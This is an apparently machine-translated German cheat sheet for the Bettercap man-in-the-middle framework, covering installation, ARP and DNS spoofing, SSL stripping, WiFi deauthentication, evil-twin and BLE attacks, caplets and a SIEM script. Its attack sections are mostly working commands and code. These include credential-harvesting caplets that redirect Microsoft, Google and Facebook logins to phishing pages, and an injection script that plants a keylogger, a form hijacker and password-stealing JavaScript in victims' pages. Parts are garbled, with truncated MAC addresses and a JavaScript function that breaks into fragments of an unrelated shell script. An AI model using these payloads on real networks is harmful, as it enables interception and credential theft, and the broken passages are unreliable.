bessercap Cheat Blatt¶
Überblick¶
Bettercap ist ein leistungsfähiges, modulares und tragbares Netzwerk-Aufklärung und MITM (Man-in-the-Middle) Angriffsrahmen für Sicherheitsforscher, Penetrationsprüfer und Netzwerkadministratoren. Ursprünglich als moderner Ersatz für Ettercap entwickelt, hat sich Bettercap zu einer umfassenden Netzwerk-Sicherheitstest-Plattform entwickelt, die mehrere Angriffsvektoren und Aufklärungstechniken zu einem einzigen, einheitlichen Rahmen verbindet. Das Tool wird in Go geschrieben, so dass es sehr tragbar und effizient über verschiedene Betriebssysteme und Architekturen.
Die modulare Architektur des Frameworks ermöglicht es Anwendern, spezifische Module für verschiedene Arten von Netzwerkangriffen und Aufklärungsaktivitäten zu laden und auszuführen. Bettercap unterstützt eine breite Palette von Protokollen und Angriffstechniken, darunter ARP-Spoofing, DNS-Spoofing, DHCP-Spoofing, Wireless-Angriffe, Bluetooth Low Energy (BLE)-Angriffe und HTTP/HTTPS-Proxy-Angriffe. Dieser umfassende Ansatz macht es zu einem unschätzbaren Werkzeug für Sicherheitsexperten, die Netzwerksicherheit aus mehreren Winkeln bewerten und Schwachstellen in verschiedenen Netzwerkschichten identifizieren müssen.
Eine der wichtigsten Stärken von Bettercap ist seine Echtzeit-Web-basierte Benutzeroberfläche, die ein intuitives Dashboard zur Überwachung und Steuerung von Angriffen bietet. Das Web UI zeigt Live-Netzwerkverkehr, erfasste Anmeldeinformationen, entdeckte Hosts und Angriffsstatus in einem leicht zu verstehenden Format. Zusätzlich enthält Bettercap leistungsfähige Skriptfunktionen durch seine JavaScript-Engine, so dass Benutzer benutzerdefinierte Angriffsszenarien erstellen und komplexe Testverfahren automatisieren können. Mit seiner aktiven Entwicklungsgemeinschaft und regelmäßigen Updates entwickelt sich Bettercap weiterhin als eines der vielseitigsten und effektivsten Netzwerksicherheitstests.
Installation¶
Ubuntu/Debian Installation¶
Installieren von Bettercap auf Ubuntu/Debian-Systemen:
```bash
Update system packages¶
sudo apt update && sudo apt upgrade -y
Install required dependencies¶
sudo apt install -y build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev \ git wget curl
Install Go (required for building from source)¶
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc source ~/.bashrc
Verify Go installation¶
go version
Install Bettercap using Go¶
go install github.com/bettercap/bettercap@latest
Add Go bin to PATH¶
echo 'export PATH=\(PATH:\)(go env GOPATH)/bin' >> ~/.bashrc source ~/.bashrc
Alternative: Install pre-compiled binary¶
wget https://github.com/bettercap/bettercap/releases/latest/download/bettercap_linux_amd64_v2.32.0.zip unzip bettercap_linux_amd64_v2.32.0.zip sudo mv bettercap /usr/local/bin/ sudo chmod +x /usr/local/bin/bettercap
Install UI dependencies (optional)¶
sudo apt install -y nodejs npm sudo npm install -g @bettercap/ui
Create bettercap user (optional)¶
sudo useradd -r -s /bin/false bettercap sudo usermod -a -G bettercap $USER
Set capabilities for non-root execution¶
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
Verify installation¶
bettercap -version ```_
CentOS/RHEL Installation¶
```bash
Install EPEL repository¶
sudo yum install -y epel-release
Install required packages¶
sudo yum groupinstall -y "Development Tools" sudo yum install -y libpcap-devel libusb-devel libnetfilter_queue-devel \ git wget curl
Install Go¶
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc source ~/.bashrc
Install Bettercap¶
go install github.com/bettercap/bettercap@latest
Set capabilities¶
sudo setcap cap_net_raw,cap_net_admin=eip $(go env GOPATH)/bin/bettercap
Configure firewall¶
sudo firewall-cmd --permanent --add-port=80/tcp sudo firewall-cmd --permanent --add-port=443/tcp sudo firewall-cmd --permanent --add-port=8080/tcp sudo firewall-cmd --reload ```_
macOS Installation¶
```bash
Install Homebrew (if not already installed)¶
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Install dependencies¶
brew install libpcap
Install Go¶
brew install go
Install Bettercap¶
go install github.com/bettercap/bettercap@latest
Alternative: Install via Homebrew¶
brew install bettercap
Verify installation¶
bettercap -version ```_
Docker Installation¶
Running Bettercap in Docker:
```bash
Pull official Bettercap Docker image¶
docker pull bettercap/bettercap
Run Bettercap in Docker with network access¶
docker run -it --rm --privileged --net=host \ -v $(pwd):/app \ bettercap/bettercap
Run with web UI¶
docker run -it --rm --privileged --net=host \ -p 80:80 -p 443:443 \ -v $(pwd):/app \ bettercap/bettercap \ -iface eth0 -caplet http-ui
Create custom Dockerfile¶
cat > Dockerfile.bettercap ``<< 'EOF' FROM golang:1.21-alpine AS builder
Install dependencies¶
RUN apk add --no-cache git build-base libpcap-dev libusb-dev linux-headers
Build Bettercap¶
RUN go install github.com/bettercap/bettercap@latest
FROM alpine:latest
Install runtime dependencies¶
RUN apk add --no-cache libpcap libusb iptables
Copy binary¶
COPY --from=builder /go/bin/bettercap /usr/local/bin/
Create working directory¶
WORKDIR /app
Expose ports¶
EXPOSE 80 443 8080
Default command¶
CMD ["bettercap"] EOF
Build custom image¶
docker build -f Dockerfile.bettercap -t custom-bettercap .
Run custom image¶
docker run -it --rm --privileged --net=host custom-bettercap ```_
Windows Installation¶
```powershell
Install using Chocolatey¶
choco install golang choco install git
Install Bettercap¶
go install github.com/bettercap/bettercap@latest
Alternative: Download pre-compiled binary¶
Download from: https://github.com/bettercap/bettercap/releases¶
# Extract to C:\Program Files\Bettercap\
Install WinPcap or Npcap (required for packet capture)¶
Download from: https://npcap.com/¶
Add to PATH¶
$env:PATH += ";C:\Program Files\Bettercap"
Verify installation¶
bettercap.exe -version ```_
Basisnutzung¶
Network Discovery¶
Grundlegende Netzwerkaufklärung und Entdeckung:
```bash
Start Bettercap with automatic interface detection¶
sudo bettercap
Specify network interface¶
sudo bettercap -iface eth0
Enable network discovery¶
sudo bettercap -iface eth0
`` net.probe on net.show
Discover hosts with specific probes¶
set net.probe.mdns true set net.probe.nbns true set net.probe.upnp true set net.probe.wsd true net.probe on
Show discovered hosts¶
hosts.show
Show network statistics¶
net.stats
Continuous host discovery¶
set ticker.period 1 set ticker.commands "clear; net.show; hosts.show" ticker on
Save discovered hosts¶
hosts.save /tmp/discovered_hosts.json
Load previously saved hosts¶
hosts.load /tmp/discovered_hosts.json ```_
ARP Spoofing¶
ARP Spoofing-Angriffe ausführen:
```bash
Basic ARP spoofing setup¶
sudo bettercap -iface eth0
Enable ARP spoofing for entire subnet¶
arp.spoof on
Target specific hosts¶
set arp.spoof.targets 192.168.1.100,192.168.1.101 arp.spoof on
Spoof specific gateway¶
set arp.spoof.fullduplex false set arp.spoof.targets 192.168.1.1 arp.spoof on
Monitor ARP spoofing status¶
arp.spoof.stats
Advanced ARP spoofing with custom intervals¶
set arp.spoof.interval 1s set arp.spoof.silent false arp.spoof on
Whitelist specific hosts (exclude from spoofing)¶
set arp.spoof.whitelist 192.168.1.50,192.168.1.51 arp.spoof on
Stop ARP spoofing¶
arp.spoof off
Ban specific hosts (disconnect them)¶
arp.ban 192.168.1.100 arp.unban 192.168.1.100 ```_
DNS Spoofing¶
DNS Spoofing und Umleitung:
```bash
Enable DNS spoofing¶
sudo bettercap -iface eth0
dns.spoof on
Spoof specific domains¶
set dns.spoof.domains example.com,*.google.com set dns.spoof.address 192.168.1.50 dns.spoof on
Use custom DNS spoofing rules¶
set dns.spoof.hosts /tmp/dns_hosts.txt dns.spoof on
Create custom DNS hosts file¶
cat > /tmp/dns_hosts.txt << 'EOF'
Custom DNS spoofing rules¶
example.com 192.168.1.50 *.facebook.com 192.168.1.51 login.microsoft.com 192.168.1.52 EOF
Advanced DNS spoofing with logging¶
set dns.spoof.silent false set dns.spoof.domains * dns.spoof on
Monitor DNS queries¶
events.stream on
Stop DNS spoofing¶
dns.spoof off ```_
HTTP/HTTPS Proxy¶
Einrichten von HTTP/HTTPS-Proxy für die Verkehrsabhörung:
```bash
Enable HTTP proxy¶
sudo bettercap -iface eth0
http.proxy on
Enable HTTPS proxy with SSL stripping¶
https.proxy on set https.proxy.sslstrip true
Custom proxy port¶
set http.proxy.port 8080 set https.proxy.port 8443 http.proxy on https.proxy on
Inject custom JavaScript¶
set http.proxy.script /tmp/inject.js http.proxy on
Create JavaScript injection script¶
cat > /tmp/inject.js << 'EOF' function onRequest(req, res) \\{ log("Request: " + req.Method + " " + req.URL);
// Log headers
for (var name in req.Headers) \\\\{
log("Header: " + name + " = " + req.Headers[name]);
\\\\}
\\}
function onResponse(req, res) \\{ log("Response: " + res.Status + " for " + req.URL);
// Inject custom content
if (res.ContentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
var newBody = body.replace("</body>",
"<script>alert('Injected by Bettercap');</script></body>");
res.Body = newBody;
\\\\}
\\} EOF
Monitor proxy traffic¶
events.stream on
Save captured data¶
http.proxy.dump /tmp/http_traffic.log ```_
Erweiterte Funktionen¶
Funkangriffe¶
WiFi Aufklärung und Angriffe:
```bash
Enable WiFi monitoring mode (requires compatible adapter)¶
sudo bettercap -iface wlan0
Start WiFi reconnaissance¶
wifi.recon on
Show discovered access points¶
wifi.show
Show connected clients¶
wifi.show.clients
Target specific access point¶
wifi.recon.channel 6 set wifi.recon.channel 6 wifi.recon on
Deauthentication attack¶
set wifi.deauth.targets aa
cc:dd:ee:ff wifi.deauth
Handshake capture¶
set wifi.handshakes.file /tmp/handshakes.pcap wifi.recon on
Evil twin attack¶
set wifi.ap.ssid "Free WiFi" set wifi.ap.bssid aa
WPS attacks¶
wifi.recon on wifi.show set wifi.wps.targets aa
Monitor WiFi events¶
events.stream on ```_
Bluetooth Low Energy (BLE) Angriffe¶
BLE Aufklärung und Angriffe:
```bash
Enable BLE reconnaissance¶
sudo bettercap
ble.recon on
Show discovered BLE devices¶
ble.show
Enumerate BLE device services¶
ble.enum aa
Write to BLE characteristics¶
ble.write aa
Clone BLE device¶
set ble.clone.target aa
Monitor BLE events¶
events.stream on
Save BLE scan results¶
ble.save /tmp/ble_devices.json ```_
Zollkontingente¶
Erstellen und Verwenden von benutzerdefinierten Caplets (Automatisierungsskripte):
```bash
Create basic reconnaissance caplet¶
cat > /tmp/recon.cap << 'EOF'
Basic network reconnaissance caplet¶
Set interface¶
set $ \\{by_name eth0\\}
Enable network discovery¶
set net.probe.mdns true set net.probe.nbns true set net.probe.upnp true net.probe on
Enable ARP spoofing for entire subnet¶
arp.spoof on
Enable DNS spoofing¶
set dns.spoof.domains * set dns.spoof.address \\{interface.ipv4\\} dns.spoof on
Enable HTTP proxy¶
set http.proxy.script /tmp/inject.js http.proxy on
Enable HTTPS proxy with SSL stripping¶
set https.proxy.sslstrip true https.proxy on
Start event streaming¶
events.stream on
Display status every 5 seconds¶
set ticker.period 5 set ticker.commands "clear; net.show; hosts.show" ticker on EOF
Run caplet¶
sudo bettercap -caplet /tmp/recon.cap
Create advanced MITM caplet¶
cat > /tmp/mitm.cap << 'EOF'
Advanced MITM attack caplet¶
Variables¶
set $TARGET 192.168.1.100 set $GATEWAY 192.168.1.1 set $INTERFACE eth0
Set interface¶
set $ \\{by_name $INTERFACE\\}
Target specific host¶
set arp.spoof.targets $TARGET set arp.spoof.fullduplex true arp.spoof on
DNS spoofing for specific domains¶
set dns.spoof.domains facebook.com,.facebook.com,google.com,.google.com set dns.spoof.address \\{interface.ipv4\\} dns.spoof on
HTTP/HTTPS proxy with custom script¶
set http.proxy.script /tmp/advanced_inject.js http.proxy on
set https.proxy.sslstrip true set https.proxy.script /tmp/advanced_inject.js https.proxy on
Logging¶
set http.proxy.dump /tmp/http_dump.log set https.proxy.dump /tmp/https_dump.log
Events¶
events.stream on EOF
Create credential harvesting caplet¶
cat > /tmp/harvest.cap << 'EOF'
Credential harvesting caplet¶
Set interface¶
set $ \\{by_name eth0\\}
ARP spoofing¶
arp.spoof on
DNS spoofing to redirect login pages¶
set dns.spoof.domains login.microsoft.com,accounts.google.com,www.facebook.com set dns.spoof.address \\{interface.ipv4\\} dns.spoof on
HTTP proxy with credential extraction¶
set http.proxy.script /tmp/harvest.js http.proxy on
HTTPS proxy¶
set https.proxy.sslstrip true set https.proxy.script /tmp/harvest.js https.proxy on
Start web server for phishing pages¶
set http.server.path /tmp/phishing set http.server.port 80 http.server on
events.stream on EOF
Run specific caplet¶
sudo bettercap -caplet /tmp/mitm.cap -iface eth0 ```_
JavaScript Module¶
Erweiterte JavaScript-Module für benutzerdefinierte Angriffe:
```javascript // Advanced HTTP/HTTPS injection script // File: /tmp/advanced_inject.js
var credentials = []; var sessions = \\{\\};
function onLoad() \\{ log("Advanced injection module loaded"); \\}
function onRequest(req, res) \\{ var url = req.URL; var method = req.Method; var host = req.Hostname;
log("[" + method + "] " + host + url);
// Log interesting headers
if (req.Headers["Authorization"]) \\\\{
log("Authorization header found: " + req.Headers["Authorization"]);
\\\\}
if (req.Headers["Cookie"]) \\\\{
log("Cookies: " + req.Headers["Cookie"]);
sessions[host] = req.Headers["Cookie"];
\\\\}
// Extract POST data for credential harvesting
if (method == "POST" && req.Body) \\\\{
var body = req.ReadBody();
log("POST data: " + body);
// Look for common credential fields
| | if (body.indexOf("password") != -1 | | body.indexOf("passwd") != -1) \\{ | | log("Potential credentials captured: " + body); credentials.push(\\{ host: host, url: url, data: body, timestamp: new Date().toISOString() \\});
// Save credentials to file
writeFile("/tmp/credentials.json", JSON.stringify(credentials, null, 2));
\\\\}
\\\\}
\\}
function onResponse(req, res) \\{ var contentType = res.ContentType; var url = req.URL; var host = req.Hostname;
log("Response: " + res.Status + " for " + url);
// Inject into HTML pages
if (contentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
// Inject keylogger
var keylogger = `
<script>
var keys = [];
document.addEventListener('keydown', function(e) \\{
keys.push(\\{
key: e.key,
timestamp: new Date().toISOString(),
url: window.location.href
\\});
// Send to attacker server every 50 keystrokes
if (keys.length >= 50) \\{
fetch('/keylog', \\{
method: 'POST',
body: JSON.stringify(keys),
headers: \\{'Content-Type': 'application/json'\\}
\\});
keys = [];
\\}
\\});
// Send on page unload
window.addEventListener('beforeunload', function() \\{
if (keys.length > 0) \\{
navigator.sendBeacon('/keylog', JSON.stringify(keys));
\\}
\\});
</script>
`;
// Inject form hijacker
var formHijacker = `
<script>
document.addEventListener('DOMContentLoaded', function() \\{
var forms = document.querySelectorAll('form');
forms.forEach(function(form) \\{
form.addEventListener('submit', function(e) \\{
var formData = new FormData(form);
var data = \\{\\};
for (var pair of formData.entries()) \\{
data[pair[0]] = pair[1];
\\}
fetch('/formdata', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
data: data,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\});
\\});
\\});
</script>
`;
// Inject scripts before closing body tag
body = body.replace("</body>", keylogger + formHijacker + "</body>");
// Replace login pages with phishing pages
| | if (url.indexOf("login") != -1 | | url.indexOf("signin") != -1) \\{ | | body = createPhishingPage(host, url); \\}
res.Body = body;
\\\\}
// Modify JavaScript files
| | if (contentType.indexOf("application/javascript") == 0 | | | | contentType.indexOf("text/javascript") == 0) \\{ var body = res.ReadBody();
// Inject malicious code into JavaScript
var maliciousCode = `
// Injected by Bettercap
setInterval(function() \\{
if (document.querySelector('input[type="password"]')) \\{
var passwords = document.querySelectorAll('input[type="password"]');
passwords.forEach(function(p) \\{
if (p.value) \\{
fetch('/password', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
password: p.value,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\}
\\});
\\}
\\}, 5000);
`;
body = maliciousCode + "\n" + body;
res.Body = body;
\\\\}
\\}
function createPhishingPage(host, url) \\{ return ` <!DOCTYPE html>
Bettercap Attack Report
Generated: $(date)
Target Network: $TARGET_NETWORK
Interface: $INTERFACE
Discovered Hosts
Port Scan Results
Captured Traffic Summary
Attack Log
$(tail -n 50 "$LOG_FILE")
EOF
log_message "Report generated: $report_file"
\\}
Cleanup function¶
cleanup() \\{ log_message "Cleaning up..."
# Kill any running Bettercap processes
pkill -f bettercap 2>/dev/null
# Reset network settings
echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
log_message "Cleanup completed"
\\}
Signal handlers¶
trap cleanup EXIT trap cleanup INT trap cleanup TERM
Main execution¶
main() \\{ log_message "Starting Bettercap automation script"
check_root
check_dependencies
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
case "$ATTACK_TYPE" in
"recon")
network_recon
;;
"mitm")
network_recon
# Extract targets from reconnaissance
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
# Get first discovered host as target
| | local target=\((grep -o '"ip":"[^"]*"' "\)OUTPUT_DIR/discovered_hosts.json" | head -n 1 | cut -d'"' -f4) | | if [ -n "\(target" ]; then mitm_attack "\)target" fi fi ;; "wifi") wifi_attack "wlan0" ;; "full") network_recon
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
| | local target=\((grep -o '"ip":"[^"]*"' "\)OUTPUT_DIR/discovered_hosts.json" | head -n 1 | cut -d'"' -f4) | | if [ -n "\(target" ]; then mitm_attack "\)target" fi fi
# WiFi attacks if interface available
if ip link show wlan0 >/dev/null 2>&1; then
wifi_attack "wlan0"
fi
;;
*)
log_message "Unknown attack type: $ATTACK_TYPE"
exit 1
;;
esac
generate_report
log_message "Attack completed. Results in: $OUTPUT_DIR"
\\}
Parse command line arguments¶
while [[ \(# -gt 0 ]]; do case \(1 in -i|--interface) INTERFACE="\)2" shift 2 ;; -t|--target) TARGET_NETWORK="\)2" shift 2 ;; -a|--attack) ATTACK_TYPE="\(2" shift 2 ;; -d|--duration) ATTACK_DURATION="\)2" shift 2 ;; -h|--help) echo "Usage: $0 [OPTIONS]" echo "Options:" echo " -i, --interface IFACE Network interface (default: eth0)" echo " -t, --target NETWORK Target network (default: 192.168.1.0/24)" | | echo " -a, --attack TYPE Attack type: recon | mitm | wifi | full (default: mitm)" | | echo " -d, --duration SECONDS Attack duration (default: 300)" echo " -h, --help Show this help" exit 0 ;; *) echo "Unknown option: $1" exit 1 ;; esac done
Run main function¶
main ```_
Integrationsbeispiele¶
SIEM Integration¶
```python
!/usr/bin/env python3¶
Bettercap SIEM integration script¶
import json import time import requests import subprocess from datetime import datetime import logging
class BettercapSIEMIntegration: def init(self, config): self.config = config self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/bettercap_siem.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def parse_bettercap_events(self, events_file):
"""Parse Bettercap events log file"""
events = []
try:
with open(events_file, 'r') as f:
for line in f:
if line.strip():
try:
event = json.loads(line)
events.append(self.normalize_event(event))
except json.JSONDecodeError:
# Handle non-JSON log lines
events.append(self.parse_text_event(line))
except FileNotFoundError:
self.logger.error(f"Events file not found: \\\\{events_file\\\\}")
return events
def normalize_event(self, event):
"""Normalize Bettercap event to common format"""
normalized = \\\\{
'timestamp': event.get('time', datetime.now().isoformat()),
'source': 'bettercap',
'event_type': event.get('tag', 'unknown'),
'severity': self.determine_severity(event),
'raw_event': event
\\\\}
# Extract specific fields based on event type
tag = event.get('tag', '')
if tag == 'net.sniff':
normalized.update(\\\\{
'src_ip': event.get('data', \\\\{\\\\}).get('src'),
'dst_ip': event.get('data', \\\\{\\\\}).get('dst'),
'protocol': event.get('data', \\\\{\\\\}).get('protocol'),
'payload': event.get('data', \\\\{\\\\}).get('payload')
\\\\})
elif tag == 'arp.spoof':
normalized.update(\\\\{
'target_ip': event.get('data', \\\\{\\\\}).get('target'),
'gateway_ip': event.get('data', \\\\{\\\\}).get('gateway'),
'attack_type': 'arp_spoofing'
\\\\})
elif tag == 'dns.spoof':
normalized.update(\\\\{
'domain': event.get('data', \\\\{\\\\}).get('domain'),
'spoofed_ip': event.get('data', \\\\{\\\\}).get('address'),
'attack_type': 'dns_spoofing'
\\\\})
elif tag == 'http.proxy':
normalized.update(\\\\{
'method': event.get('data', \\\\{\\\\}).get('method'),
'url': event.get('data', \\\\{\\\\}).get('url'),
'user_agent': event.get('data', \\\\{\\\\}).get('user_agent'),
'attack_type': 'http_interception'
\\\\})
return normalized
def parse_text_event(self, line):
"""Parse non-JSON log lines"""
return \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'bettercap',
'event_type': 'log',
'severity': 'info',
'message': line.strip()
\\\\}
def determine_severity(self, event):
"""Determine event severity"""
tag = event.get('tag', '')
high_severity_tags = ['arp.spoof', 'dns.spoof', 'wifi.deauth', 'ble.attack']
medium_severity_tags = ['http.proxy', 'https.proxy', 'net.sniff']
if tag in high_severity_tags:
return 'high'
elif tag in medium_severity_tags:
return 'medium'
else:
return 'low'
def send_to_splunk(self, events):
"""Send events to Splunk via HEC"""
if not self.config.get('splunk', \\\\{\\\\}).get('enabled', False):
return
splunk_config = self.config['splunk']
for event in events:
splunk_event = \\\\{
'time': event['timestamp'],
'source': 'bettercap',
'sourcetype': 'bettercap:event',
'index': splunk_config.get('index', 'security'),
'event': event
\\\\}
try:
response = requests.post(
splunk_config['hec_url'],
headers=\\\\{
'Authorization': f"Splunk \\\\{splunk_config['token']\\\\}",
'Content-Type': 'application/json'
\\\\},
json=splunk_event,
verify=False,
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send to Splunk: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Splunk: \\\\{e\\\\}")
def send_to_elasticsearch(self, events):
"""Send events to Elasticsearch"""
if not self.config.get('elasticsearch', \\\\{\\\\}).get('enabled', False):
return
es_config = self.config['elasticsearch']
for event in events:
index_name = f"bettercap-\\\\{datetime.now().strftime('%Y.%m.%d')\\\\}"
try:
response = requests.post(
f"\\\\{es_config['url']\\\\}/\\\\{index_name\\\\}/_doc",
json=event,
timeout=10
)
if response.status_code not in [200, 201]:
self.logger.error(f"Failed to send to Elasticsearch: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Elasticsearch: \\\\{e\\\\}")
def generate_alerts(self, events):
"""Generate alerts based on event patterns"""
alerts = []
# Group events by type and time
event_groups = \\\\{\\\\}
for event in events:
key = f"\\\\{event['event_type']\\\\}_\\\\{event.get('src_ip', 'unknown')\\\\}"
if key not in event_groups:
event_groups[key] = []
event_groups[key].append(event)
# Check for suspicious patterns
for group_key, group_events in event_groups.items():
if len(group_events) > 10: # High frequency
alerts.append(\\\\{
'alert_type': 'high_frequency_events',
'severity': 'high',
'description': f"High frequency of \\\\{group_events[0]['event_type']\\\\} events",
'event_count': len(group_events),
'time_window': '5 minutes',
'source_ip': group_events[0].get('src_ip'),
'timestamp': datetime.now().isoformat()
\\\\})
# Check for credential harvesting
credential_events = [e for e in events if 'password' in str(e).lower()]
if credential_events:
alerts.append(\\\\{
'alert_type': 'credential_harvesting',
'severity': 'critical',
'description': 'Potential credential harvesting detected',
'event_count': len(credential_events),
'timestamp': datetime.now().isoformat()
\\\\})
return alerts
def process_events(self, events_file):
"""Process Bettercap events and send to SIEM"""
self.logger.info(f"Processing events from \\\\{events_file\\\\}")
events = self.parse_bettercap_events(events_file)
if not events:
self.logger.info("No events to process")
return
self.logger.info(f"Processing \\\\{len(events)\\\\} events")
# Send to configured SIEM systems
self.send_to_splunk(events)
self.send_to_elasticsearch(events)
# Generate and send alerts
alerts = self.generate_alerts(events)
if alerts:
self.logger.info(f"Generated \\\\{len(alerts)\\\\} alerts")
for alert in alerts:
self.send_alert(alert)
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT: \\\\{alert['description']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
# Implementation depends on email configuration
pass
Configuration¶
config = \\{ 'splunk': \\{ 'enabled': True, 'hec_url': 'https://splunk.company.com:8088/services/collector/event', 'token': 'your-hec-token', 'index': 'security' \\}, 'elasticsearch': \\{ 'enabled': True, 'url': 'http://elasticsearch.company.com:9200' \\}, 'email': \\{ 'enabled': False, 'smtp_server': 'smtp.company.com', 'from': 'security@company.com', 'to': 'soc@company.com' \\} \\}
Usage¶
if name == "main": import sys
if len(sys.argv) != 2:
print("Usage: python3 bettercap_siem.py <events_file>")
sys.exit(1)
events_file = sys.argv[1]
integration = BettercapSIEMIntegration(config)
integration.process_events(events_file)
```_
Fehlerbehebung¶
Gemeinsame Themen¶
Verweigerte Fehler: ```bash
Set proper capabilities¶
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
Check capabilities¶
getcap /usr/local/bin/bettercap
Run with sudo if capabilities don't work¶
sudo bettercap
Check interface permissions¶
sudo chmod 666 /dev/net/tun ```_
Einzelheiten: ```bash
List available interfaces¶
ip link show
Check interface status¶
ip addr show eth0
Bring interface up¶
sudo ip link set eth0 up
Check for monitor mode (WiFi)¶
sudo iwconfig wlan0 mode monitor sudo ip link set wlan0 up ```_
Modul Belastungsprobleme: ```bash
Check available modules¶
bettercap -help
Update Bettercap¶
go install github.com/bettercap/bettercap@latest
Check Go environment¶
go env GOPATH go env GOROOT
Verify installation¶
bettercap -version bettercap -env-info ```_
Leistungsoptimierung¶
Optimieren von Bettercap-Leistung:
```bash
Increase system limits¶
echo "* soft nofile 65536" >> /etc/security/limits.conf echo "* hard nofile 65536" >> /etc/security/limits.conf
Optimize network buffers¶
echo 'net.core.rmem_max = 134217728' >> /etc/sysctl.conf echo 'net.core.wmem_max = 134217728' >> /etc/sysctl.conf echo 'net.core.netdev_max_backlog = 5000' >> /etc/sysctl.conf sysctl -p
Use performance caplet settings¶
set net.probe.throttle 10 set arp.spoof.interval 1s set ticker.period 5 ```_
Sicherheitsüberlegungen¶
Ethische Nutzung¶
Rechtliche Erwägungen: - Verwenden Sie nur Bettercap in Netzwerken, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - Lokale Gesetze über Netzwerksicherheitstests verstehen - ordnungsgemäße Genehmigung vor Durchführung von Penetrationstests - Dokumentation aller Prüftätigkeiten für die Erfüllung von Zwecken - Respektieren Sie Privatsphäre und Vertraulichkeit erfasster Daten
** Sicherheit:** - Verwenden Sie Bettercap in isolierten Testumgebungen, wenn möglich - Implementierung richtiger Zugriffskontrollen für erfasste Daten - Sichere Speicherung und Übermittlung sensibler Informationen - Regelmäßige Updates von Bettercap und Abhängigkeiten - Monitor für die Erkennung durch Netzwerksicherheitssysteme
Datenschutz¶
** Erfassung der Datensicherheit:** - Verschlüsseln erfasster Verkehr und Anmeldeinformationen - Implementieren Sie sichere Löschung von temporären Dateien - Verwenden Sie sichere Kanäle für die Datenübertragung - Umsetzung von Datenschutzbestimmungen - Regelmäßige Sicherheitsbewertungen der Prüfinfrastruktur
Referenzen¶
- [Beratende Website](https://LINK_5__
- [Bettercap GitHub Repository](LINK_5_
- (LINK_5_)
- Go Programming Language
- Network Security Testing Best Practices